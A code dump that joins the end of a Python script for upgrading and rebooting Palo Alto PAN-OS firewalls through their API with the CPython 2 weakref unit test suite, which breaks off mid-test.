resultWriter.writerow([fwip, "Failed", e])
sys.exit()
#Initiates the reboot
def rbfw(fwip, api_key):
# Calls the API with specific XPath. Can be found via the Firewall API GUI or CLI
# A timeout is specified here because it doesn"t return any output
try:
requests.post(f"https://{fwip}/api/?key={api_key}&type=op&cmd=<request><restart><system></system></restart></request>", verify=False, timeout=5)
except:
pass
#Pings the firewall to check if it is back online
def checkfw(fwip):
timeout = 0
time.sleep(600)
check = ping3.ping(fwip)
#ping3 returns None if there is no response from the IP
while check == None:
time.sleep(60)
check = ping3.ping(fwip)
timeout += 1
if timeout == 30:
resultWriter.writerow([fwip, "Failed", "No response from firewall after 40 minutes"])
break
#Checks the version after reboot to ensure it booted to the correct version
def verify(fwip, api_key):
try:
r = requests.post(f"https://{fwip}/api/?key={api_key}&type=op&cmd=<show><system><info></info></system></show>", verify=False)
if r.status_code == 200:
root = ET.fromstring(r.text)
panos_ver = root.find(".result/system/sw-version").text
if panos_ver == vers:
resultWriter.writerow([fwip, "Success", None])
else:
resultWriter.writerow([fwip, "Failed", "Verification failed, firewall did not upgrade to version requested."])
except:
# TODO: Add a timeout here
time.sleep(120)
verify(fwip, api_key)
#Calls all the functions in specific order
def process(fwip):
api_key = authenticate(fwip, user, pw)
softwarecheck(fwip, api_key)
download_software(fwip, api_key, vers)
install_software(fwip, api_key, vers)
rbfw(fwip, api_key)
checkfw(fwip)
verify(fwip, api_key)
if __name__ == "__main__":
#Warning message
print("***********************************************************************************************************")
print("***********************************************************************************************************")
print("***********************************************************************************************************")
print("***********************************************************************************************************")
print("***********************WARNING: THIS SCRIPT WILL REBOOT THE SELECTED FIREWALLS*****************************")
print("***********************************************************************************************************")
print("***********************************************************************************************************")
print("***********************************************************************************************************")
print("***********************************************************************************************************")
#Variables and user inputs
fw = input("\nEnter the IP/FQDNs of the firewalls in fw.txt: ")
vers = input("\nEnter the PanOS version you wish to upgrade to: ")
user = input("\nEnter your username: ")
pw = getpass.getpass("\nEnter your password: ")
proclist = []
result = []
#Get all firewalls from list
if fw == "":
fwtxt = open("fw.txt", "r")
fw = fwtxt.readlines()
fwtxt.close()
fwlist = []
for each in fw:
fwlist.append(each.strip("\r\n"))
#Creating new csv to add logs
result_log="PA-Upgrade-Results.csv"
resultcsv = open(result_log,"w", newline="")
resultWriter = csv.writer(resultcsv, delimiter=",")
resultWriter.writerow(["Firewall","Status","Error"])
#Starts multithreading
for ip in fwlist:
fwip = ip
proc = threading.Thread(target=process, args=[fwip])
proc.start()
proclist.append(proc)
#Wait for Thread to finish
for x in proclist:
x.join()
#Prompt to end
input(f"\n\n\nScript complete, results can be found in {result_log} \nPlease press enter to close.")
#Ends script
resultcsv.close()
sys.exit()
|
test_weakref.py | import gc
import sys
import unittest
import UserList
import weakref
import operator
import contextlib
import copy
import time
from test import test_support
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
def create_unbound_method():
return C.method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __ne__(self, other):
if isinstance(other, Object):
return self.arg != other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
class RefCycle:
def __init__(self):
self.cycle = self
@contextlib.contextmanager
def collect_in_thread(period=0.001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
threading = test_support.import_module('threading')
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with test_support.disable_gc():
old_interval = sys.getcheckinterval()
sys.setcheckinterval(20)
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
sys.setcheckinterval(old_interval)
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
self.check_basic_ref(create_unbound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
self.check_basic_callback(create_unbound_method)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(weakref.ReferenceError, check, ref1)
self.assertRaises(weakref.ReferenceError, check, ref2)
self.assertRaises(weakref.ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = UserList.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
with test_support.check_py3k_warnings():
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = UserList.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = UserList.UserList(range(10))
p3 = weakref.proxy(L3)
with test_support.check_py3k_warnings():
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __unicode__(self):
return u"unicode"
instance = C()
self.assertIn("__unicode__", dir(weakref.proxy(instance)))
self.assertEqual(unicode(weakref.proxy(instance)), u"unicode")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that both old-style classes and new-style classes
# are weakrefable.
class A(object):
pass
class B:
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
b = weakref.ref(B, l.append)
B = None
gc.collect()
self.assertEqual(b(), None)
self.assertEqual(l, [a, b])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
# - retain their hash is they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C(object):
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super(MyRef, self).__init__(ob, callback)
def __call__(self):
self.called = True
return super(MyRef, self).__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
# Bug #3110
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(i, o) for i, o in enumerate(items))
# Keep an iterator alive
it = dct.iteritems()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
list(it)
del it
gc.collect()
n2 = len(dct)
# iteration should prevent garbage collection here
# Note that this is a test on an implementation detail. The requirement
# is only to provide stable iteration, not that the size of the container
# stay fixed.
self.assertEqual(n1, 20)
#self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda n, k: (k, n))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda n, k: (n, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.iteritems()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.iterkeyrefs())), len(objects))
for wr in dict.iterkeyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = dict.items()
for item in dict.iteritems():
items.remove(item)
self.assertEqual(len(items), 0, "iteritems() did not touch all items")
# key iterator, via __iter__():
keys = dict.keys()
for k in dict:
keys.remove(k)
self.assertEqual(len(keys), 0, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = dict.keys()
for k in dict.iterkeys():
keys.remove(k)
self.assertEqual(len(keys), 0, "iterkeys() did not touch all keys")
# value iterator:
values = dict.values()
for v in dict.itervalues():
values.remove(v)
self.assertEqual(len(values), 0,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertFalse(k in dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
